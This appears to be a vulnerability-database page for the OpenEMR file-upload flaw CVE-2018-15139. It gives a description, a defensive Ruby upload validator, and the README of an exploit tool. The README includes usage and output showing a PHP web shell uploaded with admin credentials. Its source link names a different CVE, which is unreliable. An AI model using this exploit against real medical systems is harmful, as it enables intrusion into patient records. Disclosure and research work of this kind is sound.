Related vulnerability
Title:
OpenEMR security vulnerability
(CVE-2018-15139)
Description: OpenEMR is an open-source medical management system maintained by the OpenEMR community. It is used for medical practice management, electronic medical records, prescription writing and medical billing. A security vulnerability exists in the file interface/super/manage_site_files.php in OpenEMR before 5.0.1.4; it stems from the program not restricting the files that are uploaded. A remote attacker can upload a PHP file through the image upload form and then access that file to execute arbitrary PHP code.
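The description above says the root cause is an image upload form that does not restrict what is uploaded. As an added, defender-side example (not code from the PoC repository and not OpenEMR's own patch), the Ruby function below shows the kind of check such a form needs: it sanitizes the file name, allows only a single image extension, and verifies the content's magic bytes. The function name `validate_image_upload`, the constants and the sample inputs are all constructed for this illustration.

```ruby
# Added example: server-side validation for an image upload form.
# Not part of the PoC repository or of OpenEMR; names are hypothetical.

IMAGE_EXTENSIONS = %w[png jpg jpeg gif].freeze

# Leading bytes that identify each allowed image format (constructed table).
MAGIC = {
  'png'  => "\x89PNG\r\n\x1a\n".b,
  'jpg'  => "\xFF\xD8\xFF".b,
  'jpeg' => "\xFF\xD8\xFF".b,
  'gif'  => 'GIF8'.b
}.freeze

# Returns [:ok, safe_name] when the upload may be stored in the images
# folder, or [:reject, reason] otherwise.
def validate_image_upload(original_name, content)
  # Drop directory components so a name like "../x.png" cannot escape
  # the images directory.
  name = File.basename(original_name.to_s)
  return [:reject, 'empty file name'] if name.empty? || name.start_with?('.')

  # Exactly one dot: this also rejects double extensions such as
  # "shell.php.png", which some web server handler configurations
  # would still execute as PHP.
  m = name.match(/\A([A-Za-z0-9_-]+)\.([A-Za-z0-9]+)\z/)
  return [:reject, 'file name must be <base>.<ext> with no extra dots'] unless m

  ext = m[2].downcase
  return [:reject, "extension .#{ext} not allowed"] unless IMAGE_EXTENSIONS.include?(ext)

  # The declared type must match the actual bytes, not just the name.
  bytes = content.to_s.b
  unless bytes.start_with?(MAGIC[ext])
    return [:reject, 'content does not match the declared image type']
  end

  # A valid image header with PHP code appended (a polyglot) is still rejected.
  if bytes.include?('<?php'.b) || bytes.include?('<?='.b)
    return [:reject, 'embedded PHP tag']
  end

  [:ok, "#{m[1]}.#{ext}"]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs: a real PNG header, a PHP file, a double extension.
  p validate_image_upload('Logo.PNG', "\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR")
  p validate_image_upload('agent.php', '<?php echo 1; ?>')
  p validate_image_upload('../shell.php.png', "\x89PNG\r\n\x1a\n")
end
```

The content check is defence in depth, not a replacement for serving the upload directory without a PHP handler: even a correctly validated image directory should be configured so that nothing stored in it is ever executed by the web server.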
Description
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution
Introduction
# OpenEMR CVE-2018-15139 exploit
> OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution
Exploit for [CVE-2018-15139][CVE-2018-15139].
## Usage
```
$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution
Source: https://github.com/sec-it/exploit-CVE-2019-14530
Usage:
exploit.rb exploit <url> <filename> <username> <password> [--debug]
exploit.rb -h | --help
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<filename> Filename of the shell to be uploaded
<username> Username of the admin
<password> Password of the admin
--debug Display arguments
-h, --help Show this screen
Examples:
exploit.rb exploit http://example.org/openemr shell.php admin pass
exploit.rb exploit https://example.org:5000/ shell.php admin pass
```
## Example
```
$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php
```
## Requirements
- [httpx](https://gitlab.com/honeyryderchuck/httpx)
- [docopt.rb](https://github.com/docopt/docopt.rb)
Example using gem:
```bash
bundle install
# or
gem install httpx docopt
```
## Docker deployment of the vulnerable software
Warning: of course this setup is not suited for production usage!
```
$ sudo docker-compose up
```
The upload folder permissions are broken in the official OpenEMR docker image, so it is required to connect to the container and fix the permissions, e.g.:
```
$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/
```
## References
- Target software: **OpenEMR**
- Homepage: https://www.open-emr.org/
- Source: https://github.com/openemr/openemr
- Docker: see `docker-compose.yml`
- Vulnerable version: < 5.0.1.4 (i.e. up to and including 5.0.1.3)
- Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485
This is a better rewrite of [EDB-49998][EDB-49998].
The vulnerability was found by [Project Insecurity](https://insecurity.sh/).
Analysis of the original exploit and vulnerability:
- [OpenEMR patches serious vulnerabilities uncovered by Project Insecurity](https://www.databreaches.net/openemr-patches-serious-vulnerabilities-uncovered-by-project-insecurity/)
[EDB-49998]:https://www.exploit-db.com/exploits/49998
[CVE-2018-15139]:https://nvd.nist.gov/vuln/detail/CVE-2018-15139
File snapshot
[4.0K] /data/pocs/f1da9206b719f9a3912d8836cc7cd15a0ead7c97
├── [1002] docker-compose.yml
├── [2.7K] exploit.rb
├── [ 80] Gemfile
├── [ 272] Gemfile.lock
├── [1.1K] LICENSE
└── [2.4K] README.md
0 directories, 6 files
Notes
1. Prefer accessing the PoC through its source.
2. If the source is unavailable or inaccessible, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.